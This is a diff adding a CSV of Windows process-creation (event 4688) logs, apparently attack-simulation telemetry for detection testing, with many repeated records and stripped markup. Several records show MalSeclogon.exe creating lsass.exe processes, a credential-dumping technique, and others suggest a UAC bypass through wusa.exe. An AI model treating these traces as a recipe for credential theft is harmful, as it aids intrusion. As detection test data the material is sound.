+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 21374
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-5-20
+ WIND10$
+ WINLAB
+ 0x3e4
+ 0x1dc
+ C:\Windows\System32\notepad.exe
+ %%1936
+ 0xe8c
+
+ S-1-0-0
+ Administrator
+ WINLAB.LOCAL
+ 0x82215a
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 21374
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-5-20
+ WIND10$
+ WINLAB
+ 0x3e4
+ 0x1dc
+ C:\Windows\System32\notepad.exe
+ %%1936
+ 0xe8c
+
+ S-1-0-0
+ Administrator
+ WINLAB.LOCAL
+ 0x82215a
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 21374
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-5-20
+ WIND10$
+ WINLAB
+ 0x3e4
+ 0x1dc
+ C:\Windows\System32\notepad.exe
+ %%1936
+ 0xe8c
+
+ S-1-0-0
+ Administrator
+ WINLAB.LOCAL
+ 0x82215a
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ S-1-16-12288
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18208
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0x8dc
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x188
+
+
+"
+2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18207
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0xc74
+ C:\Windows\System32\cmd.exe
+ %%1936
+ 0x4f0
+
+
+"
+2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18205
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0x5b0
+ C:\Windows\System32\wusa.exe
+ %%1937
+ 0x4f0
+
+
+"
+2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18204
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0x27c
+ C:\Windows\System32\dllhost.exe
+ %%1936
+ 0x258
+
+
+"
+2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18201
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0xec8
+ C:\Windows\System32\dllhost.exe
+ %%1936
+ 0x258
+
+
+"
+2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18198
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0x7f0
+ C:\Windows\System32\consent.exe
+ %%1936
+ 0x3c8
+
+
+"
+2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18197
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x13765
+ 0x628
+ C:\Windows\System32\wusa.exe
+ %%1938
+ 0x4f0
+
+
+"
+2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18196
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x13765
+ 0x4f0
+ C:\Python27\python.exe
+ %%1938
+ 0x12c
+
+
+"
+2019-03-18T15:06:46.345209+04:00,1552907206.345209,4688,C:\Windows\System32\dllhost.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 433078
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0xf6c
+ C:\Windows\System32\dllhost.exe
+ %%1936
+ 0x278
+
+
+"
+2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\conhost.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 432906
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x370
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x764
+
+
+"
+2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\cmd.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 432905
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x440
+ C:\Windows\System32\cmd.exe
+ %%1936
+ 0x448
+
+
+"
+2019-03-19T02:16:09.458302+04:00,1552947369.458302,4688,C:\Windows\System32\calc.exe,WIN-77LTAPHIQ1R$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 563299
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-5-20
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x3e4
+ 0x424
+ C:\Windows\System32\calc.exe
+ %%1936
+ 0xae8
+
+
+"
+2019-03-19T02:15:49.692401+04:00,1552947349.692401,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 563298
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
